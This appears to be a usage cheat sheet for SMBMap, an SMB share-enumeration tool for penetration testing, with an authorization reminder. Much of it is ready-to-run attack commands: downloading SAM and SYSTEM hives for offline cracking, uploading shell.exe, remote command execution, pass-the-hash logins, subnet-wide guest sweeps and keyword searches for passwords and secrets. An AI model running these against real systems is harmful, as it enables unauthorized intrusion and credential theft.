Skip to content

SMBMap

SMBMap is a handy SMB enumeration tool written in Python that allows you to enumerate samba share drives across an entire domain. Useful for SMB security testing and finding sensitive files on Windows networks.

# Via pip (recommended)
pip3 install smbmap

# Via git
git clone https://github.com/ShawnDEvans/smbmap.git
cd smbmap
pip3 install -r requirements.txt
python3 smbmap.py --help
# Via pip
pip install smbmap

# Or download and run directly
python smbmap.py [options]
docker run -it --rm smbmap/smbmap:latest smbmap.py --help
smbmap -h                           # Show help
smbmap --version                    # Show version
-H, --host <ip>                    # Target host or IP
-u, --username <user>              # Username (optional for null sessions)
-p, --password <pass>              # Password
-d, --domain <domain>              # Domain name
smbmap -H 192.168.1.100                                    # No auth
smbmap -H 192.168.1.100 -u '' -p ''                      # Null session with explicit empty creds
smbmap -H 192.168.1.100 -u 'anonymous'                   # Anonymous user
smbmap -H 192.168.1.100 2>&1 | grep -i "accessible\|readable"
smbmap -H 192.168.1.100 -u 'guest' -p ''                 # Guest account
smbmap -H 192.168.1.100 --no-color                       # Disable color output
smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Username/password
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'pass'  # With domain
smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Shows all accessible shares
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L          # List only shares (compact)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$'     # Enumerate C$ share
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users'  # Enumerate Users share
smbmap -H 192.168.1.100 -u 'admin' -p 'pass'
# Output shows:
# Share name | Type | Permissions | Comment
# IPC$ | STYPE_IPC | NO ACCESS | (null)
# ADMIN$ | STYPE_DISKTREE | READ, WRITE | Remote Admin
# C$ | STYPE_DISKTREE | NO ACCESS | Default share
# Users | STYPE_DISKTREE | READ | User directory
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep WRITE
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q          # Quiet mode (minimal output)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v          # Verbose output
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r
# Recursively list all files in Users share
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r 'Documents'
# List Documents folder recursively
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | grep -i '.txt\|.pdf\|.xls'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D 'Documents/file.txt'
# Download file to current directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/sam'
# Download SAM file (requires admin)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | xargs -I {} \
  smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D '{}'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe'
# Upload shell.exe to root of Users share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe' -T 'Temp/'
# Upload to specific directory
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password\|secret\|api'
# Search recursively for sensitive keywords
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -F '*.txt\|*.conf'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -o 'results.txt'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'ipconfig'
# Execute ipconfig command

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami'
# Check current user context
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'cmd.exe /c whoami'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'ADMIN$' -x 'powershell.exe'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami && hostname && systeminfo'
smbmap -H 192.168.1.100 -u 'admin' -p '8846f7eaee8fb117ad06bdd830b7586c:8846f7eaee8fb117ad06bdd830b7586c'
# Format: LM:NT hash (can be same if only NT available)
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'hash:hash'
smbmap -H 192.168.1.100 -u 'admin' -p 'hash:hash' -x 'whoami'
for ip in 192.168.1.{1..254}; do
  timeout 2 smbmap -H $ip -u 'guest' -p '' 2>/dev/null | grep -i accessible && echo "Found: $ip"
done
smbmap -H 192.168.1.1 -u 'admin' -p 'pass' -L | grep -i 'STYPE_DISKTREE' | awk '{print $1}'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep -E 'print\|share\|backup'
FlagDescription
-H, --hostTarget host IP or hostname
-u, --usernameUsername for authentication
-p, --passwordPassword for authentication
-d, --domainDomain name (for domain users)
-LList shares only (no file enumeration)
-s, --shareSpecify a single share to enumerate
-rRecursively list directory contents
-A, --searchSearch for string in files
-F, --filterFilter files by extension
-D, --downloadDownload a file
-U, --uploadUpload a file
-x, --executeExecute a command (RCE)
-o, --outfileOutput results to file
-q, --quietQuiet mode
-v, --verboseVerbose output
--no-colorDisable colored output
# SMBMap can be chained with CrackMapExec for comprehensive testing
cme smb 192.168.1.0/24 -u admin -p password --shares
# Then use smbmap for deeper enumeration

crackmapexec smb 192.168.1.100 -u admin -p pass -x 'whoami'  # For execution
nxc smb 192.168.1.100 -u admin -p pass --shares
# Modern alternative to CrackMapExec
enum4linux 192.168.1.100                    # Get user/group info
smbmap -H 192.168.1.100 -u 'user' -p 'pass' # Then enumerate shares
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q > shares.txt
# Parse and import share access info into BloodHound for AD analysis
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L
# Will show hidden shares ending with $
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L | grep -i 'admin\|domain\|netlogon\|sysvol'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'backup\|\.bak\|\.sql\|\.db' -F '.*\.(bak|sql|db|backup)$'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'password\|api\|secret' -F '.*\.(conf|config|ini|xml|json)$'
# Download SYSTEM and SAM files for offline cracking
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SYSTEM'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SAM'
# Ensure SMB port 445 is open
nmap -p 445 192.168.1.100

# Try with SMB version specification
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --smbv2
# Verify credentials and domain
smbmap -H 192.168.1.100 -d DOMAIN.COM -u 'DOMAIN\admin' -p 'password'

# Check for account lockout
smbmap -H 192.168.1.100 -u 'admin' -p 'wrongpass' -v
# Requires appropriate share access (usually C$ or ADMIN$)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'whoami'

# May need elevated privileges
smbmap -H 192.168.1.100 -u 'domain\admin' -p 'pass' -x 'whoami'
# Increase timeout for slow networks
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v
# Add verbose flag to see timeout errors
  • Always obtain proper authorization before testing SMB shares
  • Null sessions may be disabled on modern systems but still worth checking
  • Pass-the-hash attacks require NTLM hash of user (not cleartext password)
  • Command execution typically requires local admin or system access
  • Monitor logs for SMBMap activity (Event ID 4625 for failed logins)
  • Use VPN/proxies appropriately for remote engagements
  • Credentials should be handled securely (use -p with caution in shell history)
  • nmap — Network scanning and SMB enumeration
  • enum4linux — Linux-based SMB enumeration
  • CrackMapExec — Comprehensive SMB exploitation framework
  • NetExec — Modern successor to CrackMapExec
  • smbclient — Command-line SMB/CIFS client
  • impacket — Python library for SMB protocol manipulation
  • Metasploit — Framework with SMB modules